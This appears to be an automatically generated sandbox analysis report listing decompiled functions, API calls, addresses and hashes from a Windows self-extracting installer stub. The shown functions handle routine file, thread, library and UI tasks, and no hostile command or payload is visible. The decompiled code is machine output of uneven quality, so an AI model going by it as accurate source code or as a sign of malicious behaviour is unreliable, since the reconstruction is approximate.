                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122A245, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0122A245(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E01221708( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}








                                                                                                                                                    0x0122a255
                                                                                                                                                    0x0122a25c
                                                                                                                                                    0x0122a264
                                                                                                                                                    0x0122a267
                                                                                                                                                    0x0122a274
                                                                                                                                                    0x0122a27b
                                                                                                                                                    0x0122a283
                                                                                                                                                    0x0122a289
                                                                                                                                                    0x0122a289
                                                                                                                                                    0x0122a28b
                                                                                                                                                    0x0122a28e
                                                                                                                                                    0x0122a293
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a293
                                                                                                                                                    0x0122a29d

                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0122A25C
                                                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0122A293
                                                                                                                                                      • Part of subcall function 01221708: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011708,0121BA45,00000000,.exe,?,?,00000800,?,?,0122854F,?), ref: 0122171E
                                                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0122A283
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                    • String ID: EDIT
                                                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                                                    • Opcode ID: 712e82b321aa907d45c2fbc84081f1c62a40596719b52f9f0848d6f935b6801c
                                                                                                                                                    • Instruction ID: 89ebaac055652f0ffcebab67742178b78f0c94cf899cfa0ba4a91cdd34ce5784
                                                                                                                                                    • Opcode Fuzzy Hash: 712e82b321aa907d45c2fbc84081f1c62a40596719b52f9f0848d6f935b6801c
                                                                                                                                                    • Instruction Fuzzy Hash: 88F05232B212393BE730A568AC09FAF7B6CAF42B00F440226FF04A3180C360991186F5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122A2B3, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                    			E0122A2B3(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E0121FFE3(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0x127117c(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0x1271034( &_v16);
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L0122E094(); // executed
				 *0x1271088(0x1257430,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}











                                                                                                                                                    0x0122a2c2
                                                                                                                                                    0x0122a2c9
                                                                                                                                                    0x0122a2cc
                                                                                                                                                    0x0122a2d5
                                                                                                                                                    0x0122a2dd
                                                                                                                                                    0x0122a2e4
                                                                                                                                                    0x0122a2ee
                                                                                                                                                    0x0122a2f9
                                                                                                                                                    0x0122a2fd
                                                                                                                                                    0x0122a300
                                                                                                                                                    0x0122a303
                                                                                                                                                    0x0122a30d
                                                                                                                                                    0x0122a31a

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0121FFE3: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0121FFFE
                                                                                                                                                      • Part of subcall function 0121FFE3: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0121EAC6,Crypt32.dll,00000000,0121EB4A,?,?,0121EB2C,?,?,?), ref: 01220020
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0122A2CC
                                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0122A303
                                                                                                                                                    • SHGetMalloc.SHELL32(01257430), ref: 0122A30D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                                    • String ID: riched20.dll
                                                                                                                                                    • API String ID: 3498096277-3360196438
                                                                                                                                                    • Opcode ID: adda7a4fb2bf2d0cc4b269bb2404458f2f5fae9aa81c556f00c3ec8ec89776dc
                                                                                                                                                    • Instruction ID: 9605d24bf7b21e80176b336ba12b25a2304ab60bd04838674522c9db9969b868
                                                                                                                                                    • Opcode Fuzzy Hash: adda7a4fb2bf2d0cc4b269bb2404458f2f5fae9aa81c556f00c3ec8ec89776dc
                                                                                                                                                    • Instruction Fuzzy Hash: FAF062B1D1020AABCB20EF99E8499EFFFFCEF54704F00415AE814E2200D7B446058BA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D104, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                    			E0122D104(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E0122E1C0();
				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
				_t7 = E0121FB18(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E0121FC31() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}







                                                                                                                                                    0x0122d104
                                                                                                                                                    0x0122d10c
                                                                                                                                                    0x0122d11a
                                                                                                                                                    0x0122d12f
                                                                                                                                                    0x0122d134
                                                                                                                                                    0x0122d138
                                                                                                                                                    0x0122d13d
                                                                                                                                                    0x0122d147
                                                                                                                                                    0x0122d140
                                                                                                                                                    0x0122d140
                                                                                                                                                    0x0122d146
                                                                                                                                                    0x0122d146
                                                                                                                                                    0x0122d156
                                                                                                                                                    0x0122d156
                                                                                                                                                    0x0122d160

                                                                                                                                                    APIs
                                                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0122D11A
                                                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0122D156
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                                                                    • Opcode ID: f0344e3dc538c1606b0db4e80d75a74f8f44b8abf08d36e6ebed513e77d88834
                                                                                                                                                    • Instruction ID: 20295ced998db548a60f719e2326383e0aff83631a8b0e1ef064b5fa1ddfb8f9
                                                                                                                                                    • Opcode Fuzzy Hash: f0344e3dc538c1606b0db4e80d75a74f8f44b8abf08d36e6ebed513e77d88834
                                                                                                                                                    • Instruction Fuzzy Hash: BFF0A775824279B7D720AFD6AC09BBE7BACEF15A41B100055FE4896101D6619850D7E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012197EE, Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                    			E012197EE(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E01219929(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E012197EE(_t25);
						}
					}
				}
				return _t15;
			}







                                                                                                                                                    0x012197f1
                                                                                                                                                    0x012197f3
                                                                                                                                                    0x012197fa
                                                                                                                                                    0x01219804
                                                                                                                                                    0x01219804
                                                                                                                                                    0x01219816
                                                                                                                                                    0x0121981e
                                                                                                                                                    0x0121987a
                                                                                                                                                    0x01219820
                                                                                                                                                    0x01219822
                                                                                                                                                    0x01219829
                                                                                                                                                    0x01219842
                                                                                                                                                    0x01219846
                                                                                                                                                    0x01219857
                                                                                                                                                    0x0121985b
                                                                                                                                                    0x01219875
                                                                                                                                                    0x01219875
                                                                                                                                                    0x01219867
                                                                                                                                                    0x01219867
                                                                                                                                                    0x01219870
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219872
                                                                                                                                                    0x01219872
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219872
                                                                                                                                                    0x01219870
                                                                                                                                                    0x01219848
                                                                                                                                                    0x01219848
                                                                                                                                                    0x01219851
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219853
                                                                                                                                                    0x01219853
                                                                                                                                                    0x01219853
                                                                                                                                                    0x01219851
                                                                                                                                                    0x0121982b
                                                                                                                                                    0x0121982b
                                                                                                                                                    0x01219833
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219835
                                                                                                                                                    0x01219835
                                                                                                                                                    0x01219836
                                                                                                                                                    0x01219836
                                                                                                                                                    0x0121983b
                                                                                                                                                    0x0121983b
                                                                                                                                                    0x01219833
                                                                                                                                                    0x01219829
                                                                                                                                                    0x01219882

                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 012197FE
                                                                                                                                                    • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 01219816
                                                                                                                                                    • GetLastError.KERNEL32 ref: 01219848
                                                                                                                                                    • GetLastError.KERNEL32 ref: 01219867
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2244327787-0
                                                                                                                                                    • Opcode ID: 7eb01642e82ebc0cf7312d187198755d76028c88d5626ff79109fc3af1f49b70
                                                                                                                                                    • Instruction ID: 087b2141832763afc05e806d16fede95ebbb72181dddd45aa565fbb28438c3c7
                                                                                                                                                    • Opcode Fuzzy Hash: 7eb01642e82ebc0cf7312d187198755d76028c88d5626ff79109fc3af1f49b70
                                                                                                                                                    • Instruction Fuzzy Hash: 3D110230920105EBDF35DE59E814A7937EAFB21268F01C129FE6A81198C776C9C0CF11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123A374, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                    			E0123A374(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x12705d8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x1245e70 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x6c4f95b2
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











                                                                                                                                                    0x0123a379
                                                                                                                                                    0x0123a37d
                                                                                                                                                    0x0123a384
                                                                                                                                                    0x0123a388
                                                                                                                                                    0x0123a396
                                                                                                                                                    0x0123a3a6
                                                                                                                                                    0x0123a3ac
                                                                                                                                                    0x0123a3b0
                                                                                                                                                    0x0123a3d9
                                                                                                                                                    0x0123a3db
                                                                                                                                                    0x0123a3df
                                                                                                                                                    0x0123a3e2
                                                                                                                                                    0x0123a3e2
                                                                                                                                                    0x0123a3e8
                                                                                                                                                    0x0123a3ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a3eb
                                                                                                                                                    0x0123a3b2
                                                                                                                                                    0x0123a3bb
                                                                                                                                                    0x0123a3ca
                                                                                                                                                    0x0123a3bd
                                                                                                                                                    0x0123a3c0
                                                                                                                                                    0x0123a3c6
                                                                                                                                                    0x0123a3c6
                                                                                                                                                    0x0123a3ce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a3d0
                                                                                                                                                    0x0123a3d3
                                                                                                                                                    0x0123a3d5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a3d5
                                                                                                                                                    0x0123a3ce
                                                                                                                                                    0x0123a38a
                                                                                                                                                    0x0123a38f
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,012336CF,00000000,00000000,?,0123A31B,012336CF,00000000,00000000,00000000,?,0123A518,00000006,FlsSetValue), ref: 0123A3A6
                                                                                                                                                    • GetLastError.KERNEL32(?,0123A31B,012336CF,00000000,00000000,00000000,?,0123A518,00000006,FlsSetValue,01246328,01246330,00000000,00000364,?,01238EF7), ref: 0123A3B2
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0123A31B,012336CF,00000000,00000000,00000000,?,0123A518,00000006,FlsSetValue,01246328,01246330,00000000), ref: 0123A3C0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                    • Opcode ID: 21b8e01c97e958cb208b1cc2cdbb1a738599d8e2866b5c49bf62bf96ae7dcef9
                                                                                                                                                    • Instruction ID: e39d21e01a6bd431cdfaf9609536619e92fd50581868bbabb43382c5b4bf9570
                                                                                                                                                    • Opcode Fuzzy Hash: 21b8e01c97e958cb208b1cc2cdbb1a738599d8e2866b5c49bf62bf96ae7dcef9
                                                                                                                                                    • Instruction Fuzzy Hash: 9401A776621227DBD7314B6DBC48E577B99AF85BA27100531FA4AD7141D7A0D400C7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012207E7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                    			E012207E7() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0x124ff50 > 0) {
					_t18 = 0x124ff54;
					do {
						_t7 = CreateThread(0, 0x10000, E01220930, 0x124ff50, 0,  &_v4); // executed
						_t22 = _t7;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0x124ff50);
							E01216E21(E01232DC0(E01216E26(0x124ff50)), 0x124ff50, 0x124ff50, 2);
						}
						 *_t18 = _t22;
						 *0x01250054 =  *((intOrPtr*)(0x1250054)) + 1;
						_t8 =  *0x12571d8; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0x124ff50);
					return _t8;
				}
				return _t5;
			}













                                                                                                                                                    0x012207ec
                                                                                                                                                    0x012207f0
                                                                                                                                                    0x012207f4
                                                                                                                                                    0x012207f7
                                                                                                                                                    0x0122080b
                                                                                                                                                    0x01220811
                                                                                                                                                    0x01220815
                                                                                                                                                    0x01220817
                                                                                                                                                    0x0122081c
                                                                                                                                                    0x01220839
                                                                                                                                                    0x01220839
                                                                                                                                                    0x0122083e
                                                                                                                                                    0x01220840
                                                                                                                                                    0x01220846
                                                                                                                                                    0x0122084d
                                                                                                                                                    0x01220852
                                                                                                                                                    0x01220852
                                                                                                                                                    0x01220858
                                                                                                                                                    0x01220859
                                                                                                                                                    0x0122085c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220861
                                                                                                                                                    0x01220865

                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNELBASE ref: 0122080B
                                                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 01220852
                                                                                                                                                      • Part of subcall function 01216E26: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01216E44
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                    • String ID: CreateThread failed
                                                                                                                                                    • API String ID: 2655393344-3849766595
                                                                                                                                                    • Opcode ID: 70072ba26c53f62e3965c658e001fa175803748acd0551d13193cbd55356a3b8
                                                                                                                                                    • Instruction ID: 6ed77907ece8cb8144c4d4ca0b395a00b8081c2d27f4cc4b810b5c1f3fc7625b
                                                                                                                                                    • Opcode Fuzzy Hash: 70072ba26c53f62e3965c658e001fa175803748acd0551d13193cbd55356a3b8
                                                                                                                                                    • Instruction Fuzzy Hash: 430126B1360317BBD3389E59FD84F6A379AEBA0611F10102DFB4256184CEE0A840C765
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01219E6F, Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                    			E01219E6F(void* __edx, void* _a4, long _a8) {
				char _v4;
				long _v8;
				void* __ecx;
				void* __ebp;
				int _t28;
				intOrPtr _t31;
				long _t36;
				int _t39;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t58;
				intOrPtr _t62;
				void* _t66;
				long _t68;

				_t58 = __edx;
				_t68 = _a8;
				_t49 = _t50;
				if(_t68 != 0) {
					if( *((intOrPtr*)(_t49 + 0xc)) == 1) {
						 *(_t49 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						do {
							_v8 = _v8 & 0x00000000;
							_v4 = 0;
							if( *((intOrPtr*)(_t49 + 0xc)) == 0) {
								_t28 = WriteFile( *(_t49 + 4), _a4, _t68,  &_v8, 0); // executed
								asm("sbb al, al");
								_t31 =  ~(_t28 - 1) + 1;
								_v4 = _t31;
								L14:
								if(_t31 != 0) {
									L22:
									 *((char*)(_t49 + 8)) = 1;
									return _v4;
								}
								L15:
								if( *((char*)(_t49 + 0x14)) == 0 ||  *((intOrPtr*)(_t49 + 0xc)) != 0) {
									goto L22;
								} else {
									_t65 = _t49 + 0x1e;
									if(E01216DAD(0x124ff50, _t49 + 0x1e, 0) == 0) {
										E01216FF6(0x124ff50, _t68, 0, _t65);
										goto L22;
									}
									goto L18;
								}
							}
							_t66 = 0;
							if(_t68 == 0) {
								goto L15;
							} else {
								goto L8;
							}
							while(1) {
								L8:
								_t36 = _t68 - _t66;
								if(_t36 >= 0x4000) {
									_t36 = 0x4000;
								}
								_t39 = WriteFile( *(_t49 + 4), _a4 + _t66, _t36,  &_v8, 0);
								asm("sbb al, al");
								_t31 =  ~(_t39 - 1) + 1;
								_v4 = _t31;
								if(_t31 == 0) {
									goto L15;
								}
								_t66 = _t66 + 0x4000;
								if(_t66 < _t68) {
									continue;
								}
								goto L14;
							}
							goto L15;
							L18:
						} while (_v8 >= _t68 || _v8 <= 0);
						_t62 =  *_t49;
						 *0x1242260(0);
						_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14))))();
						asm("sbb edx, 0x0");
						 *0x1242260(_t43 - _v8, _t58);
						 *((intOrPtr*)(_t62 + 0x10))();
					}
				}
				return 1;
			}


















                                                                                                                                                    0x01219e6f
                                                                                                                                                    0x01219e73
                                                                                                                                                    0x01219e77
                                                                                                                                                    0x01219e7b
                                                                                                                                                    0x01219e88
                                                                                                                                                    0x01219e92
                                                                                                                                                    0x01219e92
                                                                                                                                                    0x01219e97
                                                                                                                                                    0x01219e9c
                                                                                                                                                    0x01219e9c
                                                                                                                                                    0x01219ea5
                                                                                                                                                    0x01219eaa
                                                                                                                                                    0x01219ef8
                                                                                                                                                    0x01219f01
                                                                                                                                                    0x01219f03
                                                                                                                                                    0x01219f05
                                                                                                                                                    0x01219f09
                                                                                                                                                    0x01219f0b
                                                                                                                                                    0x01219f7e
                                                                                                                                                    0x01219f83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219f87
                                                                                                                                                    0x01219f0d
                                                                                                                                                    0x01219f11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219f19
                                                                                                                                                    0x01219f1b
                                                                                                                                                    0x01219f2b
                                                                                                                                                    0x01219f79
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219f79
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219f2b
                                                                                                                                                    0x01219f11
                                                                                                                                                    0x01219eac
                                                                                                                                                    0x01219eb0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219eb2
                                                                                                                                                    0x01219eb2
                                                                                                                                                    0x01219eb4
                                                                                                                                                    0x01219eb8
                                                                                                                                                    0x01219eba
                                                                                                                                                    0x01219eba
                                                                                                                                                    0x01219ece
                                                                                                                                                    0x01219ed7
                                                                                                                                                    0x01219ed9
                                                                                                                                                    0x01219edb
                                                                                                                                                    0x01219edf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219ee1
                                                                                                                                                    0x01219ee5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219ee7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219f2d
                                                                                                                                                    0x01219f2d
                                                                                                                                                    0x01219f42
                                                                                                                                                    0x01219f4b
                                                                                                                                                    0x01219f53
                                                                                                                                                    0x01219f5c
                                                                                                                                                    0x01219f61
                                                                                                                                                    0x01219f69
                                                                                                                                                    0x01219f69
                                                                                                                                                    0x01219e97
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0121CBD4,00000001,?,?,?,00000000,01224E3D,?,?,?), ref: 01219E8C
                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,01224E3D,?,?,?,?,?,012248E2,?), ref: 01219ECE
                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0121CBD4,00000001,?,?), ref: 01219EF8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4209713984-0
